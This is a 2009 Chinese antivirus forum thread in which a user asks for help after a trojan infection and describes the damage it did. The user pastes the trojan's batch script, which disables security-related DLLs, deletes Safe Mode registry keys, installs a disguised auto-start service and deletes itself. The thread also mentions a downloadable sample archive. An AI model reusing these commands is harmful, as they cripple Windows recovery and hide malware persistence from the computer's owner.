瑞星卡卡安全论坛技术交流区反病毒/反流氓软件论坛 举报病毒木马被报复了,高手帮忙看下

1   1  /  1  页   跳转

[求助] 举报病毒木马被报复了,高手帮忙看下

举报病毒木马被报复了,高手帮忙看下

说实话,我在卡卡论坛也混了不少时间了,就没碰见过这么NB的病毒
说也邪门了,前几天出于安全的需要,本来是开着360的,后来就装了一个诺顿考虑到瑞星杀毒要好一点,
又装上了瑞星正版杀毒和卡卡助手,360就没开启,
谁知道昨天刚关了360监控,今天病毒又来了,也太邪门了,以前一直开360也没见过报毒,我把360一关,装上瑞星和卡卡,接着木马就来了,而且木马在40个在线扫描引擎居然只有4个报毒的,而且其中就有360推荐的NOD32,我不知道这是巧合还是怎么回事,我不管是怎么回事,我先杀毒再说吧,我就发了这样一个帖子http://bbs.ikaka.com/showtopic-8584803.aspx 咱们论坛的朋友很热心,瑞星的客服服务也很好
今天上网没上任何小网站,我把所有监控都开了,还是没能挡住木马的下载,强烈怀疑是出于报复性质的木马,
恰好我的机器里面有暴风影音和迅雷
系统报错,并且木马破坏了组件注册:病毒批处理如下:
StreamLink.bat

jxbsqdqmnwztunjgadufbu迅雷浏览器高级特性支持模块
jxbsqdqmnwztunjgadufbu迅雷浏览器高级特性支持模块
jxbsqdqmnwztunjgadufbu迅雷浏览器高级特性支持模块
reg.exe ADD "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Disable Script Debugger" /t REG_SZ /d yes /F
jxbsqdqmnwztunjgadufbu迅雷浏览器高级特性支持模块
regsvr32.exe /u /s itss.dll
jxbsqdqmnwztunjgadufbu迅雷浏览器高级特性支持模块
regsvr32.exe /s jscript.dll
jxbsqdqmnwztunjgadufbu迅雷浏览器高级特性支持模块
reg.exe ADD "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Display Inline Videos" /t REG_SZ /d no /F
jxbsqdqmnwztunjgadufbu迅雷浏览器高级特性支持模块
regsvr32.exe /u /s scrrun.dll
jxbsqdqmnwztunjgadufbu迅雷浏览器高级特性支持模块
regsvr32.exe /u /s shimgvw.dll
jxbsqdqmnwztunjgadufbu迅雷浏览器高级特性支持模块
reg.exe delete HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318} /F
jxbsqdqmnwztunjgadufbu迅雷浏览器高级特性支持模块
reg.exe ADD "HKCU\Software\Microsoft\Internet Explorer\Main" /v Play_Animations /t REG_SZ /d no /F
jxbsqdqmnwztunjgadufbu迅雷浏览器高级特性支持模块
reg.exe ADD "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Display Inline Images" /t REG_SZ /d yes /F
jxbsqdqmnwztunjgadufbu迅雷浏览器高级特性支持模块
reg.exe ADD "HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{D27CDB6E-AE6D-11cf-96B8-444553540000}" /v "Compatibility Flags" /t REG_SZ /d 00000400 /F
jxbsqdqmnwztunjgadufbu迅雷浏览器高级特性支持模块
regsvr32.exe /u /s vbscript.dll
jxbsqdqmnwztunjgadufbu迅雷浏览器高级特性支持模块
*
jxbsqdqmnwztunjgadufbu迅雷浏览器高级特性支持模块
reg.exe ADD "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Display Inline Images" /t REG_SZ /d yes /F
jxbsqdqmnwztunjgadufbu迅雷浏览器高级特性支持模块
reg.exe ADD "HKCU\Software\Microsoft\Internet Explorer\Main" /v Play_Background_Sounds /t REG_SZ /d no /F
jxbsqdqmnwztunjgadufbu迅雷浏览器高级特性支持模块
regsvr32.exe /u /s scrrun.dll
jxbsqdqmnwztunjgadufbu迅雷浏览器高级特性支持模块
reg.exe delete HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318} /F
jxbsqdqmnwztunjgadufbu迅雷浏览器高级特性支持模块
reg.exe ADD "HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{D27CDB6E-AE6D-11cf-96B8-444553540000}" /v "Compatibility Flags" /t REG_SZ /d 00000400 /F
jxbsqdqmnwztunjgadufbu迅雷浏览器高级特性支持模块
reg.exe delete HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318} /F


sc.exe create ccosmSrv BinPath= "C:\Program Files\StormII\stormSrv.exe /asservice" type= own type= interact start= auto DisplayName= InputXpath
sc.exe description ccosmSrv "Contrl Center of Storm Media"
del %0
exit

jxbsqdqmnwztunjgadufbu迅雷浏览器高级特性支持模块


用户系统信息:Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
分享到:
gototop
 

回复: 举报病毒木马被报复了,高手帮忙看下

我赶紧打开了360,太蹊跷了,联网图标接着就不亮,360提示我发现了木马群
而且貌似后台下载也停止了,在回到c盘根目录底下,木马居然在自杀?自动删除
重启以后,系统组件被破坏掉了,很多软件和控制面板都提示没有注册类别,
我找了条命令修复了默认系统组件,控制面板里面的项目能打开了
又用for %1 in (%windir%\system32\*.dll) do regsvr32.exe /s %1注册了全部动态连接库
还是不行
所以请教高手帮忙再次分析
以下是病毒部分源文件

附件附件:

文件名:bingdu2.rar
下载次数:608
文件类型:application/octet-stream
文件大小:
上传时间:2009-1-7 13:20:01
描述:rar

gototop
 

回复:举报病毒木马被报复了,高手帮忙看下

金山清理专家已经不能运行了,现在只能用IE上网,别的浏览器都不能用
提示错误为read
貌似我机器上面的病毒没有完全运行,中间的时候被我用杀毒软件给阻止,现在留下后遗症,目前所知就是有时候打开网页会自动关闭,更重要的是中毒之后,很多程序提示类似于"没有注册类别"这样的字样
一开始控制面板也打不开,后来重新用批处理注册了下dll动态链接库,控制面板能打开了,应用程序还是不行
一双击就提示类似于"没有注册类别"这样的字样
文件关联没有错误,exe文件能启动
不是所有的clsID都被请空了,如果那样的话,重新安装程序能使用
但是我重新安装了程序也是提示"没有注册类别"
好像是注册表或者组策略让病毒给限制住了,修复这一步,只要无大碍,不偷取我的密码我就谢天谢地了!
gototop
 

回复: 举报病毒木马被报复了,高手帮忙看下

这是sreng日志

附件附件:

文件名:SREngLOG.log
下载次数:1264
文件类型:application/octet-stream
文件大小:
上传时间:2009-1-7 17:36:49
描述:log

gototop
 
1   1  /  1  页   跳转
页面顶部
Powered by Discuz!NT